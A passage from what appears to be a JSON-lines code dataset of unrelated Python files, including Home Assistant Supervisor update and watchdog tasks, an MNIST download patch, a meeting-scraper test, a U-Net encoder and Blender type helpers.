_update_addons(self):\n \"\"\"Check if an update is available for an Add-on and update it.\"\"\"\n for addon in self.sys_addons.all:\n if not addon.is_installed or not addon.auto_update:\n continue\n\n # Evaluate available updates\n if not addon.need_update:\n continue\n if not addon.test_update_schema():\n _LOGGER.warning(\n \"Add-on %s will be ignored, schema tests failed\", addon.slug\n )\n continue\n\n # Run Add-on update sequential\n # avoid issue on slow IO\n _LOGGER.info(\"Add-on auto update process %s\", addon.slug)\n try:\n await addon.update(backup=True)\n except AddonsError:\n _LOGGER.error(\"Can't auto update Add-on %s\", addon.slug)\n\n @Job(\n conditions=[\n JobCondition.FREE_SPACE,\n JobCondition.INTERNET_HOST,\n JobCondition.RUNNING,\n ]\n )\n async def _update_supervisor(self):\n \"\"\"Check and run update of Supervisor Supervisor.\"\"\"\n if not self.sys_supervisor.need_update:\n return\n\n _LOGGER.info(\n \"Found new Supervisor version %s, updating\",\n self.sys_supervisor.latest_version,\n )\n await self.sys_supervisor.update()\n\n async def _watchdog_homeassistant_docker(self):\n \"\"\"Check running state of Docker and start if they is close.\"\"\"\n if not self.sys_homeassistant.watchdog:\n # Watchdog is not 
enabled for Home Assistant\n return\n if self.sys_homeassistant.error_state:\n # Home Assistant is in an error state, this is handled by the rollback feature\n return\n if not await self.sys_homeassistant.core.is_failed():\n # The home assistant container is not in a failed state\n return\n if self.sys_homeassistant.core.in_progress:\n # Home Assistant has a task in progress\n return\n if await self.sys_homeassistant.core.is_running():\n # Home Assistant is running\n return\n\n _LOGGER.warning(\"Watchdog found a problem with Home Assistant Docker!\")\n try:\n await self.sys_homeassistant.core.start()\n except HomeAssistantError as err:\n _LOGGER.error(\"Home Assistant watchdog reanimation failed!\")\n self.sys_capture_exception(err)\n else:\n return\n\n _LOGGER.info(\"Rebuilding the Home Assistant Container\")\n await self.sys_homeassistant.core.rebuild()\n\n async def _watchdog_homeassistant_api(self):\n \"\"\"Create scheduler task for monitoring running state of API.\n\n Try 2 times to call API before we restart Home-Assistant. Maybe we had\n a delay in our system.\n \"\"\"\n if not self.sys_homeassistant.watchdog:\n # Watchdog is not enabled for Home Assistant\n return\n if self.sys_homeassistant.error_state:\n # Home Assistant is in an error state, this is handled by the rollback feature\n return\n if not await self.sys_homeassistant.core.is_running():\n # The home assistant container is not running\n return\n if self.sys_homeassistant.core.in_progress:\n # Home Assistant has a task in progress\n return\n if await self.sys_homeassistant.api.check_api_state():\n # Home Assistant is running properly\n return\n\n # Init cache data\n retry_scan = self._cache.get(HASS_WATCHDOG_API, 0)\n\n # Look like we run into a problem\n retry_scan += 1\n if retry_scan == 1:\n self._cache[HASS_WATCHDOG_API] = retry_scan\n _LOGGER.warning(\"Watchdog miss API response from Home Assistant\")\n return\n\n _LOGGER.error(\"Watchdog found a problem with Home Assistant API!\")\n try:\n await self.sys_homeassistant.core.restart()\n except HomeAssistantError as err:\n _LOGGER.error(\"Home Assistant watchdog reanimation failed!\")\n self.sys_capture_exception(err)\n finally:\n self._cache[HASS_WATCHDOG_API] = 0\n\n @Job(conditions=JobCondition.RUNNING)\n async def _update_cli(self):\n \"\"\"Check and run update of cli.\"\"\"\n if not self.sys_plugins.cli.need_update:\n return\n\n _LOGGER.info(\n \"Found new cli version %s, updating\", self.sys_plugins.cli.latest_version\n )\n await self.sys_plugins.cli.update()\n\n @Job(conditions=JobCondition.RUNNING)\n async def _update_dns(self):\n \"\"\"Check and run update of CoreDNS plugin.\"\"\"\n if not self.sys_plugins.dns.need_update:\n return\n\n _LOGGER.info(\n \"Found new CoreDNS plugin version %s, updating\",\n self.sys_plugins.dns.latest_version,\n )\n await self.sys_plugins.dns.update()\n\n @Job(conditions=JobCondition.RUNNING)\n async def _update_audio(self):\n \"\"\"Check and run update of PulseAudio plugin.\"\"\"\n if not self.sys_plugins.audio.need_update:\n return\n\n _LOGGER.info(\n \"Found new PulseAudio plugin version %s, updating\",\n self.sys_plugins.audio.latest_version,\n )\n await self.sys_plugins.audio.update()\n\n @Job(conditions=JobCondition.RUNNING)\n async def _update_observer(self):\n \"\"\"Check and run update of Observer plugin.\"\"\"\n if not self.sys_plugins.observer.need_update:\n return\n\n _LOGGER.info(\n \"Found new Observer plugin version %s, updating\",\n self.sys_plugins.observer.latest_version,\n )\n await 
self.sys_plugins.observer.update()\n\n @Job(conditions=JobCondition.RUNNING)\n async def _update_multicast(self):\n \"\"\"Check and run update of multicast.\"\"\"\n if not self.sys_plugins.multicast.need_update:\n return\n\n _LOGGER.info(\n \"Found new Multicast version %s, updating\",\n self.sys_plugins.multicast.latest_version,\n )\n await self.sys_plugins.multicast.update()\n\n async def _watchdog_dns_docker(self):\n \"\"\"Check running state of Docker and start if they is close.\"\"\"\n # if CoreDNS is active\n if await self.sys_plugins.dns.is_running() or self.sys_plugins.dns.in_progress:\n return\n _LOGGER.warning(\"Watchdog found a problem with CoreDNS plugin!\")\n\n # Detect loop\n await self.sys_plugins.dns.loop_detection()\n\n try:\n await self.sys_plugins.dns.start()\n except CoreDNSError:\n _LOGGER.error(\"CoreDNS watchdog reanimation failed!\")\n\n async def _watchdog_audio_docker(self):\n \"\"\"Check running state of Docker and start if they is close.\"\"\"\n # if PulseAudio plugin is active\n if (\n await self.sys_plugins.audio.is_running()\n or self.sys_plugins.audio.in_progress\n ):\n return\n _LOGGER.warning(\"Watchdog found a problem with PulseAudio plugin!\")\n\n try:\n await self.sys_plugins.audio.start()\n except AudioError:\n _LOGGER.error(\"PulseAudio watchdog reanimation failed!\")\n\n async def _watchdog_cli_docker(self):\n \"\"\"Check running state of Docker and start if they is close.\"\"\"\n # if cli plugin is active\n if await self.sys_plugins.cli.is_running() or self.sys_plugins.cli.in_progress:\n return\n _LOGGER.warning(\"Watchdog found a problem with cli plugin!\")\n\n try:\n await self.sys_plugins.cli.start()\n except CliError:\n _LOGGER.error(\"CLI watchdog reanimation failed!\")\n\n async def _watchdog_observer_docker(self):\n \"\"\"Check running state of Docker and start if they is close.\"\"\"\n # if observer plugin is active\n if (\n await self.sys_plugins.observer.is_running()\n or self.sys_plugins.observer.in_progress\n ):\n return\n _LOGGER.warning(\"Watchdog/Docker found a problem with observer plugin!\")\n\n try:\n await self.sys_plugins.observer.start()\n except ObserverError:\n _LOGGER.error(\"Observer watchdog reanimation failed!\")\n\n async def _watchdog_observer_application(self):\n \"\"\"Check running state of application and rebuild if they is not response.\"\"\"\n # if observer plugin is active\n if (\n self.sys_plugins.observer.in_progress\n or await self.sys_plugins.observer.check_system_runtime()\n ):\n return\n _LOGGER.warning(\"Watchdog/Application found a problem with observer plugin!\")\n\n try:\n await self.sys_plugins.observer.rebuild()\n except ObserverError:\n _LOGGER.error(\"Observer watchdog reanimation failed!\")\n\n async def _watchdog_multicast_docker(self):\n \"\"\"Check running state of Docker and start if they is close.\"\"\"\n # if multicast plugin is active\n if (\n await self.sys_plugins.multicast.is_running()\n or self.sys_plugins.multicast.in_progress\n ):\n return\n _LOGGER.warning(\"Watchdog found a problem with Multicast plugin!\")\n\n try:\n await self.sys_plugins.multicast.start()\n except MulticastError:\n _LOGGER.error(\"Multicast watchdog reanimation failed!\")\n\n async def _watchdog_addon_docker(self):\n \"\"\"Check running state of Docker and start if they is close.\"\"\"\n for addon in self.sys_addons.installed:\n # if watchdog need looking for\n if not addon.watchdog or await addon.is_running():\n continue\n\n # if Addon have running actions\n if addon.in_progress or addon.state != 
AddonState.STARTED:\n continue\n\n _LOGGER.warning(\"Watchdog found a problem with %s!\", addon.slug)\n try:\n await addon.start()\n except AddonsError as err:\n _LOGGER.error(\"%s watchdog reanimation failed with %s\", addon.slug, err)\n self.sys_capture_exception(err)\n\n async def _watchdog_addon_application(self):\n \"\"\"Check running state of the application and start if they is hangs.\"\"\"\n for addon in self.sys_addons.installed:\n # if watchdog need looking for\n if not addon.watchdog or addon.state != AddonState.STARTED:\n continue\n\n # Init cache data\n retry_scan = self._cache.get(addon.slug, 0)\n\n # if Addon have running actions / Application work\n if addon.in_progress or await addon.watchdog_application():\n continue\n\n # Look like we run into a problem\n retry_scan += 1\n if retry_scan == 1:\n self._cache[addon.slug] = retry_scan\n _LOGGER.warning(\n \"Watchdog missing application response from %s\", addon.slug\n )\n return\n\n _LOGGER.warning(\"Watchdog found a problem with %s application!\", addon.slug)\n try:\n await addon.restart()\n except AddonsError as err:\n _LOGGER.error(\"%s watchdog reanimation failed with %s\", addon.slug, err)\n self.sys_capture_exception(err)\n finally:\n self._cache[addon.slug] = 0\n\n async def _refresh_addon(self) -> None:\n \"\"\"Refresh addon state.\"\"\"\n for addon in self.sys_addons.installed:\n # if watchdog need looking for\n if addon.watchdog or addon.state != AddonState.STARTED:\n continue\n\n # if Addon have running actions\n if addon.in_progress or await addon.is_running():\n continue\n\n # Adjust state\n addon.state = AddonState.STOPPED\n\n async def _check_connectivity(self) -> None:\n \"\"\"Check system connectivity.\"\"\"\n value = self._cache.get(\"connectivity\", 0)\n\n # Need only full check if not connected or each 10min\n if value >= 600:\n pass\n elif (\n self.sys_supervisor.connectivity\n and self.sys_host.network.connectivity is None\n ) or (\n self.sys_supervisor.connectivity\n and self.sys_host.network.connectivity is not None\n and self.sys_host.network.connectivity\n ):\n self._cache[\"connectivity\"] = value + RUN_CHECK_CONNECTIVITY\n return\n\n # Check connectivity\n try:\n await self.sys_supervisor.check_connectivity()\n if HostFeature.NETWORK in self.sys_host.features:\n await self.sys_host.network.check_connectivity()\n finally:\n self._cache[\"connectivity\"] = 0\n"} {"ext": "py", "sha": "1a2eae319cfbe17043e034104537c118c88238da", "content": "\"\"\"Patch to fix MNIST download issue as described here:\n- https://github.com/pytorch/ignite/issues/1737\n- https://github.com/pytorch/vision/issues/3500\n\"\"\"\n\nimport os\nimport subprocess as sp\n\nimport torch\nfrom torchvision.datasets.mnist import MNIST, read_image_file, read_label_file\nfrom torchvision.datasets.utils import extract_archive\n\n\ndef patched_download(self):\n \"\"\"wget patched download method.\n \"\"\"\n if self._check_exists():\n return\n\n os.makedirs(self.raw_folder, exist_ok=True)\n os.makedirs(self.processed_folder, exist_ok=True)\n\n # download files\n for url, md5 in self.resources:\n filename = url.rpartition(\"/\")[2]\n download_root = os.path.expanduser(self.raw_folder)\n extract_root = None\n remove_finished = False\n\n if extract_root is None:\n extract_root = download_root\n if not filename:\n filename = os.path.basename(url)\n\n # Use wget to download archives\n sp.run([\"wget\", url, \"-P\", download_root])\n\n archive = os.path.join(download_root, filename)\n print(\"Extracting {} to {}\".format(archive, extract_root))\n 
extract_archive(archive, extract_root, remove_finished)\n\n # process and save as torch files\n print(\"Processing...\")\n\n training_set = (\n read_image_file(os.path.join(self.raw_folder, \"train-images-idx3-ubyte\")),\n read_label_file(os.path.join(self.raw_folder, \"train-labels-idx1-ubyte\")),\n )\n test_set = (\n read_image_file(os.path.join(self.raw_folder, \"t10k-images-idx3-ubyte\")),\n read_label_file(os.path.join(self.raw_folder, \"t10k-labels-idx1-ubyte\")),\n )\n with open(os.path.join(self.processed_folder, self.training_file), \"wb\") as f:\n torch.save(training_set, f)\n with open(os.path.join(self.processed_folder, self.test_file), \"wb\") as f:\n torch.save(test_set, f)\n\n print(\"Done!\")\n\n\ndef main():\n # Patch download method\n MNIST.download = patched_download\n # Download MNIST\n MNIST(\".\", download=True)\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a2eae3d0fd3157590329c9965e9d4739f1f61d9", "content": "from datetime import datetime\nfrom os.path import dirname, join\n\nimport pytest # noqa\nfrom city_scrapers_core.constants import COMMITTEE, PASSED\nfrom city_scrapers_core.utils import file_response\nfrom freezegun import freeze_time\n\nfrom city_scrapers.spiders.cuya_emergency_services_advisory import (\n CuyaEmergencyServicesAdvisorySpider,\n)\n\ntest_response = file_response(\n join(dirname(__file__), \"files\", \"cuya_emergency_services_advisory.html\"),\n url=\"http://bc.cuyahogacounty.us/en-US/CC-EmergencySrvcsAdvsryBrd.aspx\",\n)\ntest_detail_response = file_response(\n join(dirname(__file__), \"files\", \"cuya_emergency_services_advisory_detail.html\"),\n url=\"http://bc.cuyahogacounty.us/en-US/091119-CCESAB-Comms-meeting.aspx\",\n)\nspider = CuyaEmergencyServicesAdvisorySpider()\n\nfreezer = freeze_time(\"2019-09-25\")\nfreezer.start()\n\nparsed_items = [item for item in spider.parse(test_response)]\nparsed_item = [item for item in spider._parse_detail(test_detail_response)][0]\n\nfreezer.stop()\n\n\ndef test_count():\n assert len(parsed_items) == 30\n\n\ndef test_title():\n assert parsed_item[\"title\"] == \"CCESAB Communications Committee\"\n\n\ndef test_description():\n assert parsed_item[\"description\"] == \"\"\n\n\ndef test_start():\n assert parsed_item[\"start\"] == datetime(2019, 9, 11, 10, 15)\n\n\ndef test_end():\n assert parsed_item[\"end\"] == datetime(2019, 9, 11, 11, 30)\n\n\ndef test_time_notes():\n assert parsed_item[\"time_notes\"] == \"\"\n\n\ndef test_id():\n assert (\n parsed_item[\"id\"]\n == \"cuya_emergency_services_advisory/201909111015/x/ccesab_communications_committee\" # noqa\n )\n\n\ndef test_status():\n assert parsed_item[\"status\"] == PASSED\n\n\ndef test_location():\n assert parsed_item[\"location\"] == {\n \"name\": \"The Cassidy Theatre\",\n \"address\": \"6200 Pearl Road Parma Heights, OH 44130\",\n }\n\n\ndef test_source():\n assert parsed_item[\"source\"] == test_detail_response.url\n\n\ndef test_links():\n assert parsed_item[\"links\"] == [\n {\n \"href\": \"http://bc.cuyahogacounty.us/ViewFile.aspx?file=7DSCAKoM0rqkeTzD%2f6%2f4cw%3d%3d\", # noqa\n \"title\": \"Agenda\",\n }\n ]\n\n\ndef test_classification():\n assert parsed_item[\"classification\"] == COMMITTEE\n\n\ndef test_all_day():\n assert parsed_item[\"all_day\"] is False\n"} {"ext": "py", "sha": "1a2eaf7dce5f6991f2e16b384403c2ea3c1ffc91", "content": "# -*- coding: utf-8 -*-\n# :Project: metapensiero.pj -- compatibility\n# :Created: lun 30 mar 2020, 01:48:33\n# :Author: Alberto Berti \n# :License: GNU General Public License version 
3 or later\n# :Copyright: © 2020 Alberto Berti\n#\n\nimport ast\nimport sys\n\nis_py36 = sys.version_info >= (3, 6)\n\nif is_py36:\n assign_types = (ast.Assign, ast.AnnAssign)\nelse:\n assign_types = (ast.Assign,)\n"} {"ext": "py", "sha": "1a2eaf9174fbdebd534e3827025ee1181b781017", "content": "import math\n\nfrom os.path import join as pjoin\nfrom collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass DoubleConv(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(DoubleConv, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_channels, out_channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2)\n )\n def forward(self, x): \n return self.conv(x)\n\nclass SingleConv_no_pool(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(SingleConv_no_pool, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_channels, out_channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n )\n def forward(self, x):\n if x.size()[1]== 1: \n x = x.repeat(1,3,1,1) \n return self.conv(x)\n\nclass SingleConv_with_pool(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(SingleConv_with_pool, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2)\n )\n def forward(self, x): \n return self.conv(x)\n\n\nclass UNET_encoder(nn.Module):\n\n def __init__(self):\n super().__init__()\n width = 32\n self.width = width\n\n self.root = nn.Sequential(OrderedDict([\n ('unit1', SingleConv_no_pool(3, width))\n ]))\n\n self.body = nn.Sequential(OrderedDict([\n ('block1', nn.Sequential(OrderedDict(\n [('unit2', SingleConv_with_pool(width, width*2))] \n ))),\n ('block2', nn.Sequential(OrderedDict(\n [('unit3', DoubleConv(width*2, width*4))] \n ))),\n ('block3', nn.Sequential(OrderedDict(\n [('unit4', DoubleConv(width*4, width*8))] \n ))),\n ('block4', nn.Sequential(OrderedDict(\n [('unit5', DoubleConv(width*8, width*16))] \n ))),\n ]))\n\n def forward(self, x):\n features = []\n x = self.root(x)\n b, c, in_size, _ = x.size()\n features.append(x)\n for i in range(len(self.body)-1):\n x = self.body[i](x)\n features.append(x)\n x = self.body[-1](x)\n return x, features[::-1]\n\n\nclass UNET_encoder_FETS(nn.Module):\n\n def __init__(self):\n super().__init__()\n width = 32\n self.width = width\n\n self.root = nn.Sequential(OrderedDict([\n ('unit1', SingleConv_no_pool(4, width))\n ]))\n\n self.body = nn.Sequential(OrderedDict([\n ('block1', nn.Sequential(OrderedDict(\n [('unit2', SingleConv_with_pool(width, width*2))] \n ))),\n ('block2', nn.Sequential(OrderedDict(\n [('unit3', DoubleConv(width*2, width*4))] \n ))),\n ('block3', nn.Sequential(OrderedDict(\n [('unit4', DoubleConv(width*4, width*8))] \n ))),\n ('block4', nn.Sequential(OrderedDict(\n [('unit5', DoubleConv(width*8, width*16))] \n ))),\n ]))\n\n def forward(self, x):\n features = []\n x = self.root(x)\n b, c, in_size, _ = x.size()\n features.append(x)\n for i in range(len(self.body)-1):\n x = self.body[i](x)\n features.append(x)\n x = self.body[-1](x)\n return x, 
features[::-1]"} {"ext": "py", "sha": "1a2eb12cd9ff66b3d062b24e3cc0580f5782c12d", "content": "# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# \n\nfrom _bpy import types as bpy_types\nimport _bpy\n\nStructRNA = bpy_types.bpy_struct\nStructMetaPropGroup = bpy_types.bpy_struct_meta_idprop\n# StructRNA = bpy_types.Struct\n\nbpy_types.BlendDataLibraries.load = _bpy._library_load\nbpy_types.BlendDataLibraries.write = _bpy._library_write\nbpy_types.BlendData.user_map = _bpy._rna_id_collection_user_map\nbpy_types.BlendData.batch_remove = _bpy._rna_id_collection_batch_remove\n\n\nclass Context(StructRNA):\n __slots__ = ()\n\n def copy(self):\n from types import BuiltinMethodType\n new_context = {}\n generic_attrs = (\n *StructRNA.__dict__.keys(),\n \"bl_rna\", \"rna_type\", \"copy\",\n )\n for attr in dir(self):\n if not (attr.startswith(\"_\") or attr in generic_attrs):\n value = getattr(self, attr)\n if type(value) != BuiltinMethodType:\n new_context[attr] = value\n\n return new_context\n\n\nclass Library(bpy_types.ID):\n __slots__ = ()\n\n @property\n def users_id(self):\n \"\"\"ID data blocks which use this library\"\"\"\n import bpy\n\n # See: readblenentry.c, IDTYPE_FLAGS_ISLINKABLE,\n # we could make this an attribute in rna.\n attr_links = (\n \"actions\", \"armatures\", \"brushes\", \"cameras\",\n \"curves\", \"grease_pencils\", \"collections\", \"images\",\n \"lights\", \"lattices\", \"materials\", \"metaballs\",\n \"meshes\", \"node_groups\", \"objects\", \"scenes\",\n \"sounds\", \"speakers\", \"textures\", \"texts\",\n \"fonts\", \"worlds\",\n )\n\n return tuple(id_block\n for attr in attr_links\n for id_block in getattr(bpy.data, attr)\n if id_block.library == self)\n\n\nclass Texture(bpy_types.ID):\n __slots__ = ()\n\n @property\n def users_material(self):\n \"\"\"Materials that use this texture\"\"\"\n import bpy\n return tuple(mat for mat in bpy.data.materials\n if self in [slot.texture\n for slot in mat.texture_slots\n if slot]\n )\n\n @property\n def users_object_modifier(self):\n \"\"\"Object modifiers that use this texture\"\"\"\n import bpy\n return tuple(\n obj for obj in bpy.data.objects if\n self in [\n mod.texture\n for mod in obj.modifiers\n if mod.type == 'DISPLACE']\n )\n\n\nclass Collection(bpy_types.ID):\n __slots__ = ()\n\n @property\n def users_dupli_group(self):\n \"\"\"The collection instance objects this collection is used in\"\"\"\n import bpy\n return tuple(obj for obj in bpy.data.objects\n if self == obj.instance_collection)\n\n\nclass Object(bpy_types.ID):\n __slots__ = ()\n\n @property\n def children(self):\n \"\"\"All the children of this object. 
Warning: takes O(len(bpy.data.objects)) time.\"\"\"\n import bpy\n return tuple(child for child in bpy.data.objects\n if child.parent == self)\n\n @property\n def users_collection(self):\n \"\"\"The collections this object is in. Warning: takes O(len(bpy.data.collections) + len(bpy.data.scenes)) time.\"\"\"\n import bpy\n return (\n tuple(\n collection for collection in bpy.data.collections\n if self in collection.objects[:]\n ) + tuple(\n scene.collection for scene in bpy.data.scenes\n if self in scene.collection.objects[:]\n )\n )\n\n @property\n def users_scene(self):\n \"\"\"The scenes this object is in. Warning: takes O(len(bpy.data.scenes) * len(bpy.data.objects)) time.\"\"\"\n import bpy\n return tuple(scene for scene in bpy.data.scenes\n if self in scene.objects[:])\n\n\nclass WindowManager(bpy_types.ID):\n __slots__ = ()\n\n def popup_menu(self, draw_func, title=\"\", icon='NONE'):\n import bpy\n popup = self.popmenu_begin__internal(title, icon=icon)\n\n try:\n draw_func(popup, bpy.context)\n finally:\n self.popmenu_end__internal(popup)\n\n def popover(\n self, draw_func, *,\n ui_units_x=0,\n keymap=None,\n from_active_button=False,\n ):\n import bpy\n popup = self.popover_begin__internal(\n ui_units_x=ui_units_x,\n from_active_button=from_active_button,\n )\n\n try:\n draw_func(popup, bpy.context)\n finally:\n self.popover_end__internal(popup, keymap=keymap)\n\n def popup_menu_pie(self, event, draw_func, title=\"\", icon='NONE'):\n import bpy\n pie = self.piemenu_begin__internal(title, icon=icon, event=event)\n\n if pie:\n try:\n draw_func(pie, bpy.context)\n finally:\n self.piemenu_end__internal(pie)\n\n\nclass WorkSpace(bpy_types.ID):\n __slots__ = ()\n\n def status_text_set(self, text):\n \"\"\"\n Set the status text or None to clear,\n When text is a function, this will be called with the (header, context) arguments.\n \"\"\"\n from bl_ui.space_statusbar import STATUSBAR_HT_header\n draw_fn = getattr(STATUSBAR_HT_header, \"_draw_orig\", None)\n if draw_fn is None:\n draw_fn = STATUSBAR_HT_header._draw_orig = STATUSBAR_HT_header.draw\n\n if not (text is None or isinstance(text, str)):\n draw_fn = text\n text = None\n\n self.status_text_set_internal(text)\n STATUSBAR_HT_header.draw = draw_fn\n\n\nclass _GenericBone:\n \"\"\"\n functions for bones, common between Armature/Pose/Edit bones.\n internal subclassing use only.\n \"\"\"\n __slots__ = ()\n\n def translate(self, vec):\n \"\"\"Utility function to add *vec* to the head and tail of this bone\"\"\"\n self.head += vec\n self.tail += vec\n\n def parent_index(self, parent_test):\n \"\"\"\n The same as 'bone in other_bone.parent_recursive'\n but saved generating a list.\n \"\"\"\n # use the name so different types can be tested.\n name = parent_test.name\n\n parent = self.parent\n i = 1\n while parent:\n if parent.name == name:\n return i\n parent = parent.parent\n i += 1\n\n return 0\n\n @property\n def x_axis(self):\n \"\"\" Vector pointing down the x-axis of the bone.\n \"\"\"\n from mathutils import Vector\n return self.matrix.to_3x3() @ Vector((1.0, 0.0, 0.0))\n\n @property\n def y_axis(self):\n \"\"\" Vector pointing down the y-axis of the bone.\n \"\"\"\n from mathutils import Vector\n return self.matrix.to_3x3() @ Vector((0.0, 1.0, 0.0))\n\n @property\n def z_axis(self):\n \"\"\" Vector pointing down the z-axis of the bone.\n \"\"\"\n from mathutils import Vector\n return self.matrix.to_3x3() @ Vector((0.0, 0.0, 1.0))\n\n @property\n def basename(self):\n \"\"\"The name of this bone before any '.' 
character\"\"\"\n # return self.name.rsplit(\".\", 1)[0]\n return self.name.split(\".\")[0]\n\n @property\n def parent_recursive(self):\n \"\"\"A list of parents, starting with the immediate parent\"\"\"\n parent_list = []\n parent = self.parent\n\n while parent:\n if parent:\n parent_list.append(parent)\n\n parent = parent.parent\n\n return parent_list\n\n @property\n def center(self):\n \"\"\"The midpoint between the head and the tail.\"\"\"\n return (self.head + self.tail) * 0.5\n\n @property\n def vector(self):\n \"\"\"\n The direction this bone is pointing.\n Utility function for (tail - head)\n \"\"\"\n return (self.tail - self.head)\n\n @property\n def children(self):\n \"\"\"A list of all the bones children. Warning: takes O(len(bones)) time.\"\"\"\n return [child for child in self._other_bones if child.parent == self]\n\n @property\n def children_recursive(self):\n \"\"\"A list of all children from this bone. Warning: takes O(len(bones)**2) time.\"\"\"\n bones_children = []\n for bone in self._other_bones:\n index = bone.parent_index(self)\n if index:\n bones_children.append((index, bone))\n\n # sort by distance to parent\n bones_children.sort(key=lambda bone_pair: bone_pair[0])\n return [bone for index, bone in bones_children]\n\n @property\n def children_recursive_basename(self):\n \"\"\"\n Returns a chain of children with the same base name as this bone.\n Only direct chains are supported, forks caused by multiple children\n with matching base names will terminate the function\n and not be returned. Warning: takes O(len(bones)**2) time.\n \"\"\"\n basename = self.basename\n chain = []\n\n child = self\n while True:\n children = child.children\n children_basename = []\n\n for child in children:\n if basename == child.basename:\n children_basename.append(child)\n\n if len(children_basename) == 1:\n child = children_basename[0]\n chain.append(child)\n else:\n if children_basename:\n print(\"multiple basenames found, \"\n \"this is probably not what you want!\",\n self.name, children_basename)\n\n break\n\n return chain\n\n @property\n def _other_bones(self):\n id_data = self.id_data\n id_data_type = type(id_data)\n\n if id_data_type == bpy_types.Object:\n bones = id_data.pose.bones\n elif id_data_type == bpy_types.Armature:\n bones = id_data.edit_bones\n if not bones: # not in edit mode\n bones = id_data.bones\n\n return bones\n\n\nclass PoseBone(StructRNA, _GenericBone, metaclass=StructMetaPropGroup):\n __slots__ = ()\n\n @property\n def children(self):\n obj = self.id_data\n pbones = obj.pose.bones\n self_bone = self.bone\n\n return tuple(pbones[bone.name] for bone in obj.data.bones\n if bone.parent == self_bone)\n\n\nclass Bone(StructRNA, _GenericBone, metaclass=StructMetaPropGroup):\n __slots__ = ()\n\n\nclass EditBone(StructRNA, _GenericBone, metaclass=StructMetaPropGroup):\n __slots__ = ()\n\n def align_orientation(self, other):\n \"\"\"\n Align this bone to another by moving its tail and settings its roll\n the length of the other bone is not used.\n \"\"\"\n vec = other.vector.normalized() * self.length\n self.tail = self.head + vec\n self.roll = other.roll\n\n def transform(self, matrix, scale=True, roll=True):\n \"\"\"\n Transform the the bones head, tail, roll and envelope\n (when the matrix has a scale component).\n\n :arg matrix: 3x3 or 4x4 transformation matrix.\n :type matrix: :class:`mathutils.Matrix`\n :arg scale: Scale the bone envelope by the matrix.\n :type scale: bool\n :arg roll:\n\n Correct the roll to point in the same relative\n direction to the head and 
tail.\n\n :type roll: bool\n \"\"\"\n from mathutils import Vector\n z_vec = self.matrix.to_3x3() @ Vector((0.0, 0.0, 1.0))\n self.tail = matrix @ self.tail\n self.head = matrix @ self.head\n\n if scale:\n scalar = matrix.median_scale\n self.head_radius *= scalar\n self.tail_radius *= scalar\n\n if roll:\n self.align_roll(matrix @ z_vec)\n\n\ndef ord_ind(i1, i2):\n if i1 < i2:\n return i1, i2\n return i2, i1\n\n\nclass Mesh(bpy_types.ID):\n __slots__ = ()\n\n def from_pydata(self, vertices, edges, faces):\n \"\"\"\n Make a mesh from a list of vertices/edges/faces\n Until we have a nicer way to make geometry, use this.\n\n :arg vertices:\n\n float triplets each representing (X, Y, Z)\n eg: [(0.0, 1.0, 0.5), ...].\n\n :type vertices: iterable object\n :arg edges:\n\n int pairs, each pair contains two indices to the\n *vertices* argument. eg: [(1, 2), ...]\n\n :type edges: iterable object\n :arg faces:\n\n iterator of faces, each faces contains three or more indices to\n the *vertices* argument. eg: [(5, 6, 8, 9), (1, 2, 3), ...]\n\n :type faces: iterable object\n\n .. warning::\n\n Invalid mesh data\n *(out of range indices, edges with matching indices,\n 2 sided faces... etc)* are **not** prevented.\n If the data used for mesh creation isn't known to be valid,\n run :class:`Mesh.validate` after this function.\n \"\"\"\n from itertools import chain, islice, accumulate\n\n face_lengths = tuple(map(len, faces))\n\n self.vertices.add(len(vertices))\n self.edges.add(len(edges))\n self.loops.add(sum(face_lengths))\n self.polygons.add(len(faces))\n\n self.vertices.foreach_set(\"co\", tuple(chain.from_iterable(vertices)))\n self.edges.foreach_set(\"vertices\", tuple(chain.from_iterable(edges)))\n\n vertex_indices = tuple(chain.from_iterable(faces))\n loop_starts = tuple(islice(chain([0], accumulate(face_lengths)), len(faces)))\n\n self.polygons.foreach_set(\"loop_total\", face_lengths)\n self.polygons.foreach_set(\"loop_start\", loop_starts)\n self.polygons.foreach_set(\"vertices\", vertex_indices)\n\n # if no edges - calculate them\n if faces and (not edges):\n self.update(calc_edges=True)\n elif edges:\n self.update(calc_edges_loose=True)\n\n @property\n def edge_keys(self):\n return [ed.key for ed in self.edges]\n\n\nclass MeshEdge(StructRNA):\n __slots__ = ()\n\n @property\n def key(self):\n return ord_ind(*tuple(self.vertices))\n\n\nclass MeshLoopTriangle(StructRNA):\n __slots__ = ()\n\n @property\n def center(self):\n \"\"\"The midpoint of the face.\"\"\"\n face_verts = self.vertices[:]\n mesh_verts = self.id_data.vertices\n return (\n mesh_verts[face_verts[0]].co +\n mesh_verts[face_verts[1]].co +\n mesh_verts[face_verts[2]].co\n ) 